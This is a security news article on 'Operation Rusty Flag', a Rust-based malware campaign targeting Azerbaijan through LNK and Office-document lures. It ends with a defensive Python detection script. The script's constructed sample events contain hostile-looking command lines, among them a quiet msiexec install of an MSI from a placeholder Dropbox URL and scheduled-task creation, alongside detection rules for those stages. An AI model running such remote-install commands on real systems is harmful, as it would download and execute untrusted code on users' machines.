In a recent cybersecurity development, a new campaign named “Operation Rusty Flag” has emerged, with Azerbaijan being the primary target of a sophisticated Rust-based malware deployment. Cybersecurity experts from Deep Instinct have been closely monitoring this operation, which has not been directly associated with any known threat actor or group. This campaign exhibits a high level of complexity, featuring at least two distinct initial access vectors.
One particularly noteworthy aspect is the use of a modified document previously employed by the Storm-0978 group, raising suspicions of a potential “false flag” operation.
The attack chain within Operation Rusty Flag is multifaceted, using an LNK file named 1.KARABAKH.jpg.lnk as a launchpad to fetch a second-stage MSI installer hosted on Dropbox. Upon execution, this installer drops a Rust-written implant, an XML file that registers a scheduled task to execute the implant, and a decoy image file watermarked with the symbol of the Azerbaijan Ministry of Defense.
An alternative infection vector involves a Microsoft Office document titled “Overview_of_UWCs_UkraineInNATO_campaign.docx,” exploiting a six-year-old memory corruption vulnerability (CVE-2017-11882) in Microsoft Office’s Equation Editor. The document retrieves a different MSI file from a Dropbox URL, which in turn delivers a variant of the same Rust backdoor.
Notably, the use of “Overview_of_UWCs_UkraineInNATO_campaign.docx” as a lure is significant, as it bears the same filename previously utilized by Storm-0978 in recent cyberattacks targeting Ukraine, capitalizing on an Office remote code execution flaw (CVE-2023-36884). This similarity suggests an intentional attempt to mislead and attribute the attack to Storm-0978, indicating a potential false flag operation.
The Rust-based backdoors, one of which disguises itself as “WinDefenderHealth.exe,” can gather data from compromised systems and transmit it to a server controlled by the attackers.
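As an added example (not code from Deep Instinct's report or from the campaign), the following Python triage script flags, in constructed process-creation events, the behaviours the article describes: a double-extension LNK, msiexec fetching an MSI from Dropbox, a scheduled task registered from an XML file, a Defender-lookalike binary outside the Windows directory, and a child process spawned by the Equation Editor. Every path, URL and event below is made up for illustration.

```python
import re

# Constructed sample process-creation events (not real telemetry), modelled
# on the stages described in the article.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\explorer.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Users\u\Downloads\1.KARABAKH.jpg.lnk"'},
    {"image": r"C:\Windows\System32\msiexec.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"msiexec.exe /i https://www.dropbox.com/s/EXAMPLE/installer.msi /qn"},
    {"image": r"C:\Windows\System32\schtasks.exe", "parent": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'schtasks /create /tn Health /xml "C:\ProgramData\task.xml"'},
    {"image": r"C:\ProgramData\WinDefenderHealth.exe", "parent": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"C:\ProgramData\WinDefenderHealth.exe"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\EQNEDT32.EXE",
     "cmdline": r"cmd.exe /c start msiexec"},
    {"image": r"C:\Windows\System32\notepad.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"notepad.exe C:\Users\u\notes.txt"},  # benign control event
]

# Each rule maps one stage of the described chain to a simple predicate.
RULES = [
    ("double_extension_lnk",
     lambda e: re.search(r"\.(jpe?g|png|pdf|docx?)\.lnk\b", e["cmdline"], re.I)),
    ("msiexec_remote_dropbox",
     lambda e: e["image"].lower().endswith("msiexec.exe")
     and re.search(r"https?://\S*dropbox\.com/\S+\.msi", e["cmdline"], re.I)),
    ("schtasks_from_xml",
     lambda e: e["image"].lower().endswith("schtasks.exe")
     and re.search(r"/create\b.*\s/xml\b", e["cmdline"], re.I)),
    ("defender_lookalike_outside_windows",
     lambda e: e["image"].lower().endswith("\\windefenderhealth.exe")
     and not e["image"].lower().startswith("c:\\windows\\")),
    ("equation_editor_child",
     lambda e: e["parent"].lower().endswith("eqnedt32.exe")),
]


def detect_chain(events):
    """Return (event_index, rule_name) for every event matching a rule."""
    return [(i, name) for i, e in enumerate(events)
            for name, rule in RULES if rule(e)]


def stages_seen(findings):
    """Number of distinct chain stages observed; several stages together on one host
    is a much stronger signal than any single rule firing alone."""
    return len({name for _, name in findings})


if __name__ == "__main__":
    hits = detect_chain(SAMPLE_EVENTS)
    for idx, name in hits:
        print(f"event {idx}: {name}")
    print("distinct stages:", stages_seen(hits))
```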
While the precise objectives of Operation Rusty Flag remain uncertain, there is speculation that it may be a red team exercise testing the waters with this evolving malware. Security experts note that Rust is gaining popularity among malware authors, and that existing security products struggle to detect Rust-based threats accurately because reverse engineering Rust binaries to identify such malware is complex.